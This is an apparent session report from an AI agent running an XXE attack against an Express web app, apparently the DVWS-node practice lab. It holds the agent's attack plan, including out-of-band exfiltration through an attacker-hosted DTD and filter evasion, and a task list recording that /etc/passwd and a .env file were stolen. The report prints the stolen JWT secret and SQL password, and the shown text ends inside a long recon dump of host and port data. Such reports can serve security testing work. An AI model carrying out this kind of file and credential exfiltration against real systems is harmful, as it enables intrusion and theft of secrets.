Skip to content

XXE 1IBLJ_session

Jump to bottom
“samuele edited this page Mar 30, 2026 · 1 revision

AI Agent Session Report

Date: 3/30/2026, 8:46:51 PM
Phase: Informational
Step: 14
Model: claude-opus-4-6

Task List

  • Query Neo4j for existing recon data on the target
  • HTTP GET on port 80 root to identify Express app
  • Enumerate SOAP/WSDL paths
  • Identify XXE vector - Import Notes XML at POST /api/v2/notes/import/xml
  • Register account and login
  • XXE PoC confirmed - /etc/passwd exfiltrated
  • Exfiltrate /home/dvws-node/.env - DONE: JWT_SECRET=access, SQL_PASSWORD=mysecretpassword
  • Retrieve package.json contents from notes - DONE: full app structure revealed
  • Try external DTD approach for app.js exfiltration (optional escalation)
  • Exfiltrate /proc/self/environ - failed due to null bytes
  • Check /api/download for path traversal as secondary vector

Session Timeline

User 8:37:27 PM

Target port 80. Discover SOAP/WSDL endpoints on the Express application. Craft an XXE payload in the SOAP XML envelope to read /etc/passwd. Escalate to exfiltrate application source code and environment files.

Deep Think 8:38:04 PM

Trigger: First iteration — establishing initial strategy

Situation: We are at iteration 1/100 in the informational phase targeting port 80, which hosts an Express application. Our objective is to discover SOAP/WSDL endpoints, craft XXE payloads via SOAP XML envelopes to read /etc/passwd, and then escalate to exfiltrate application source code and environment files. No reconnaissance data has been gathered yet, and no prior steps have been executed. We need to first enumerate the target to find SOAP/WSDL endpoints before crafting any XXE payloads.

Attack Vectors: WSDL endpoint discovery via common path enumeration (e.g., /wsdl, /soap, /service, /api, /?wsdl, /ws), Directory and file brute-forcing on port 80 to find SOAP-related endpoints, Spidering/crawling the Express app for links to WSDL or XML-processing endpoints, XXE injection via SOAP XML envelope with external entity declarations to read local files, XXE with parameter entities for out-of-band (OOB) data exfiltration if inline reflection is blocked, XXE escalation to read application source (e.g., /app/index.js, /app/server.js, /app/app.js, package.json), XXE escalation to read environment files (.env, /proc/self/environ, /etc/environment), SSRF via XXE to probe internal services if direct file read is restricted, Content-Type manipulation (sending XML to JSON endpoints to trigger XML parsing)

Approach: Start with systematic enumeration of the Express application on port 80. First, query Neo4j for any existing recon data. Then perform HTTP reconnaissance: fetch the root page, check common SOAP/WSDL paths (/wsdl, /soap, /service, /ws, /?wsdl, etc.), and look for any XML-processing endpoints. Express apps don't natively serve SOAP, so there's likely a middleware like 'strong-soap', 'soap', or 'express-xml-bodyparser' — identifying the specific endpoint and how it processes XML is critical before crafting the XXE payload. Once a SOAP/WSDL endpoint is found, we craft a minimal XXE payload in a SOAP envelope to read /etc/passwd as proof of concept, then escalate to source code and env files. This approach is best because blind XXE attempts without knowing the correct endpoint will waste iterations.

Priority: Step 1: Query Neo4j for any existing reconnaissance data on the target (hosts, services, ports, paths) → Step 2: Perform HTTP GET on port 80 root (/) to identify the Express app, headers, and any clues → Step 3: Enumerate common SOAP/WSDL paths via HTTP requests: /wsdl, /soap, /service, /ws, /api, /?wsdl, /service?wsdl, /soap?wsdl → Step 4: Run directory brute-force with a focused wordlist targeting XML/SOAP/WSDL/API paths → Step 5: Analyze discovered WSDL to understand expected SOAP envelope structure, operations, and namespaces → Step 6: Craft XXE payload within a properly-structured SOAP envelope to read /etc/passwd via file:///etc/passwd → Step 7: If inline XXE fails, attempt OOB XXE exfiltration using parameter entities and an external DTD hosted on attacker-controlled server → Step 8: Once /etc/passwd is confirmed, escalate to read application source — try common Express paths: /app/index.js, /app/server.js, /app/app.js, /opt/app/, /home//app/* → Step 9: Read package.json to map the full application structure and dependencies → Step 10: Exfiltrate environment files: .env, /proc/self/environ, /proc/self/cmdline to extract secrets, API keys, database credentials

Risks: Risk 1: SOAP/WSDL endpoint may use non-standard paths — Mitigation: broad enumeration with multiple wordlists and checking response codes/content types. Risk 2: XML parser may have XXE protections (libxml2 with NOENT disabled, or explicit DTD rejection) — Mitigation: try multiple XXE variants including parameter entities, CDATA wrapping, and different protocols (file://, php://, expect://). Risk 3: Express may not reflect XML entity values in responses (blind XXE) — Mitigation: set up OOB exfiltration channel using HTTP or DNS callbacks. Risk 4: WAF or input validation may block DOCTYPE declarations — Mitigation: try encoding tricks, nested entities, or UTF-16 encoding of the payload. Risk 5: File paths for source code may vary — Mitigation: use /proc/self/cwd to resolve working directory, then read relative paths. Risk 6: Large files may cause XML parser errors — Mitigation: use CDATA sections and chunked reading approaches.

Thinking 8:38:13 PM

Starting from scratch with no prior reconnaissance. The objective is to discover SOAP/WSDL endpoints on an Express application running on port 80, then exploit XXE via SOAP XML envelopes. First, I need to query the Neo4j graph for any existing recon data about the target - IPs, ports, services, endpoints, paths, etc.

Reasoning

Following the graph-first approach and the deep think analysis. Step 1 is to query Neo4j for any existing reconnaissance data before making any active requests. This will tell me the target IP, any known endpoints, technologies, and services already discovered.

Tool: query_graph 8:38:13 PM [OK]

Arguments

  • question: Show all hosts, IPs, ports, services, endpoints, paths, technologies, and base URLs in the graph
Raw Output 
[{'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 21, 'protocol': 'tcp', 'port_state': 'open', 'service': 'ftp', 'service_product': 'vsftpd', 'service_version': '2.3.4', 'base_url': None, 'http_status': None, 'page_title': None, 'endpoint_path': None, 'method': None, 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 22, 'protocol': 'tcp', 'port_state': 'open', 'service': 'ssh', 'service_product': 'OpenSSH', 'service_version': '9.6p1 Ubuntu 3ubuntu13.15', 'base_url': None, 'http_status': None, 'page_title': None, 'endpoint_path': None, 'method': None, 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/Upload', 'method': 'POST', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/notes', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/info', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'POST', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/uploads', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/static', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/index.html', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/css', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/true/', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/g', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/binary/', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'POST', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'POST', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/', 'method': 'GET', 'technology': 'jQuery', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/Upload', 'method': 'POST', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/notes', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/info', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'POST', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/uploads', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/static', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/index.html', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/css', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/true/', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/g', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/binary/', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'POST', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'POST', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/', 'method': 'GET', 'technology': 'Node.js', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/Upload', 'method': 'POST', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/notes', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/info', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'POST', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/uploads', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/static', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/index.html', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/css', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/true/', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/g', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/binary/', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'POST', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'POST', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/', 'method': 'GET', 'technology': 'Express', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/Upload', 'method': 'POST', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 